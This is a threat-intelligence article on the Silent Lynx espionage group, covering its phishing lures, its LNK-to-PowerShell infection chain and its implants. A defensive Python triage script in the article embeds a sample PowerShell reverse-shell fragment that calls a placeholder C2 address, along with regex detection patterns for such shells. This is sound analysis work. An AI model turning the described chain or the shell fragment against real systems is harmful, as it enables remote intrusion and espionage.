
Silent Lynx: Espionage Group Expands Campaigns Across Central Asia

Silent Lynx, a sophisticated cyber-espionage group tracked since 2024, has intensified its surveillance and infiltration campaigns across Central Asia, targeting diplomatic and government institutions.

Security researchers from Seqrite were the first to use this name, assigning it to distinguish the cluster from overlapping activity tracked by other vendors as YoroTrooper, Sturgeon Phisher, and ShadowSilk.


A Focused Espionage Operation

Silent Lynx has become notorious for spear-phishing campaigns impersonating government officials. Their deceptive emails typically carry malicious attachments disguised as legitimate diplomatic correspondence, crafted to harvest sensitive data from high-value targets.

The group often leverages fake summit-related communications as lures to distribute weaponized payloads. According to Seqrite researchers, these operations are hastily constructed yet highly targeted, zeroing in on diplomatic entities involved in high-level international meetings.

Their activities span Tajikistan, Azerbaijan, Russia, and China, particularly focusing on nations engaged in cross-border infrastructure projects and strategic partnerships.


Recent Campaigns in 2025

Seqrite analysts identified two distinct Silent Lynx campaigns in 2025, both employing similar infection techniques but pursuing different geopolitical objectives:

  • October 2025: Targeted diplomats preparing for the Russia-Azerbaijan Summit.
  • Late 2025: Focused on organizations tied to China-Central Asian relations.

These campaigns underscore a coordinated espionage effort driven by political motives rather than financial incentives.


Infection Chain and Technical Breakdown

The attack begins with a malicious RAR archive whose filename uses a double extension so that it reads as a PDF document, for example:

“План развитие стратегического сотрудничества.pdf.rar” (Plan for Development of Strategic Cooperation).

Upon extraction, the archive reveals a malicious Windows shortcut (.LNK) file that launches powershell.exe to download and execute obfuscated scripts hosted on GitHub.

A notable artifact is the working-directory string embedded in the shortcut's metadata:

C:\Users\GoBus\OneDrive\Рабочий стол

This leftover user-profile path (the Russian "Рабочий стол" is "Desktop") gave researchers a pivot for linking related samples and operations.

The PowerShell script is passed Base64-encoded; once decoded it is a reverse shell that connects to the command-and-control (C2) server over port 443.

The payload keeps a TCP session open, runs each operator-supplied command through Invoke-Expression, and sends the output back over the same connection.
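The chain above (LNK → powershell.exe → Base64 payload → reverse shell) is exactly what an analyst triages from the attachment itself, and the working-directory artifact comes from the LNK's StringData section. The following is an added example, not Seqrite's tooling or code from the article: it parses the Shell Link header and StringData fields of a .LNK, recovers WORKING_DIR and COMMAND_LINE_ARGUMENTS, decodes a -EncodedCommand (UTF-16LE, Base64) payload and flags reverse-shell and download-cradle indicators. The LNK bytes, the PowerShell fragment, the 203.0.113.10 address and the example.invalid URL are all constructed for the example; only the working-directory string mirrors the value reported above.

```python
"""Static triage of a malicious .LNK (example code, not Seqrite's tooling).

Parses the Shell Link header and StringData section to recover WORKING_DIR and
COMMAND_LINE_ARGUMENTS, decodes a -EncodedCommand payload (UTF-16LE, Base64),
and flags reverse-shell / download-cradle indicators.  The LNK bytes and the
PowerShell one-liner below are constructed for this example."""
import base64
import re
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
# LinkFlags bits (MS-SHLLINK 2.1.1); StringData fields appear in this fixed order
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, IS_UNICODE = 0x01, 0x02, 0x80
STRING_FIELDS = [(0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
                 (0x20, "arguments"), (0x40, "icon_location")]

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec,
# -enc, ...), so match the prefix rather than the full switch name.
ENC_RE = re.compile(r"-e(?!xecutionpolicy|p\b)[a-z]*\s+([A-Za-z0-9+/=]{16,})", re.I)
INDICATORS = {
    "tcp_client": re.compile(r"Net\.Sockets\.TCPClient", re.I),
    "stream_io": re.compile(r"\.GetStream\(\)", re.I),
    "invoke_expression": re.compile(r"\b(?:iex|Invoke-Expression)\b", re.I),
    "port_443": re.compile(r"\b443\b"),
    "download_cradle": re.compile(r"DownloadString|Invoke-WebRequest|\biwr\b|Net\.WebClient", re.I),
}


def is_lnk(data: bytes) -> bool:
    return (len(data) >= 0x4C and struct.unpack_from("<I", data, 0)[0] == 0x4C
            and data[4:20] == LNK_CLSID)


def parse_lnk(data: bytes) -> dict:
    """Return LinkFlags plus whichever StringData fields the file carries."""
    if not is_lnk(data):
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    pos = 0x4C  # end of the fixed-size ShellLinkHeader
    if flags & HAS_LINK_TARGET_ID_LIST:  # IDListSize (2 bytes) + IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:            # LinkInfoSize counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    out = {"flags": flags}
    for bit, name in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]  # CountCharacters, no terminator
        pos += 2
        if flags & IS_UNICODE:
            out[name] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            out[name] = data[pos:pos + count].decode("cp1252", errors="replace")
            pos += count
    return out


def decode_encoded_command(arguments: str):
    """Decode the first -EncodedCommand value, or return None if absent/invalid."""
    m = ENC_RE.search(arguments)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage_lnk(data: bytes) -> dict:
    info = parse_lnk(data)
    args = info.get("arguments", "")
    decoded = decode_encoded_command(args)
    # Scan the switches with the Base64 blob removed plus the decoded script, so
    # indicator regexes never fire on coincidental substrings of the Base64 text.
    text = ENC_RE.sub("", args) + "\n" + (decoded or "")
    hits = sorted(k for k, rx in INDICATORS.items() if rx.search(text))
    return {"working_dir": info.get("working_dir"), "arguments": args,
            "decoded_command": decoded, "indicators": hits,
            "verdict": "suspicious" if len(hits) >= 2 else "review"}


def build_lnk(working_dir: str, arguments: str) -> bytes:
    """Construct a minimal Unicode LNK carrying only WORKING_DIR and ARGUMENTS."""
    flags = 0x10 | 0x20 | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags,
                         0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)  # ShowCommand = SW_SHOWNORMAL

    def string_data(s: str) -> bytes:
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    return header + string_data(working_dir) + string_data(arguments)


# Constructed sample: indicator-bearing fragments of a TCP reverse shell (not a
# working implant); the C2 address is from the RFC 5737 documentation range and
# the working directory mirrors the metadata value reported in the article.
SAMPLE_SCRIPT = ("$c=New-Object Net.Sockets.TCPClient('203.0.113.10',443);"
                 "$s=$c.GetStream();$o=iex $cmd 2>&1 | Out-String")
SAMPLE_ARGS = "-nop -w hidden -e " + base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode()
SAMPLE_LNK = build_lnk(r"C:\Users\GoBus\OneDrive\Рабочий стол", SAMPLE_ARGS)

if __name__ == "__main__":
    for key, value in triage_lnk(SAMPLE_LNK).items():
        print(f"{key}: {value}")
```

Pointing `triage_lnk` at a real shortcut (`triage_lnk(open(path, "rb").read())`) gives the embedded working directory, the raw arguments, the decoded script and the indicator list in one pass; the verdict threshold is deliberately simple and is meant as a triage hint, not a detection rule.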


Deployed Implants and Tools

Silent Lynx deploys three implants to maintain control of compromised hosts:

  • Silent Loader – a C++-based downloader for secondary payloads.
  • Laplas – a TCP/TLS reverse shell enabling remote command execution.
  • SilentSweeper – a .NET implant capable of extracting and executing embedded PowerShell scripts.

SilentSweeper accepts command-line arguments such as -extract and -debug, reads an embedded qw.ps1 script from its resources, executes it, and downloads further payloads.

In later stages, operators also use Ligolo-ng, an open-source tunneling tool that gives them a reverse tunnel into the compromised network for pivoting and lateral movement.


Operational Sophistication and OPSEC Gaps

While Silent Lynx shows strong operational security (OPSEC) awareness—through script obfuscation and encrypted communications—it still exhibits recurring infrastructure reuse and identifiable metadata that aid in attribution.

This combination of advanced techniques and human errors allows researchers to continuously track the group’s activities across regions.


Conclusion

Silent Lynx’s recent campaigns illustrate the evolving nature of state-sponsored cyber-espionage in Central Asia.

By exploiting geopolitical events and diplomatic communications, the group continues to threaten regional cybersecurity and intelligence confidentiality.

For governments and organizations operating in sensitive sectors, stronger email security, endpoint monitoring, and detection of anomalous PowerShell activity (in particular shortcut files launching encoded commands) are crucial steps to counter such threats.
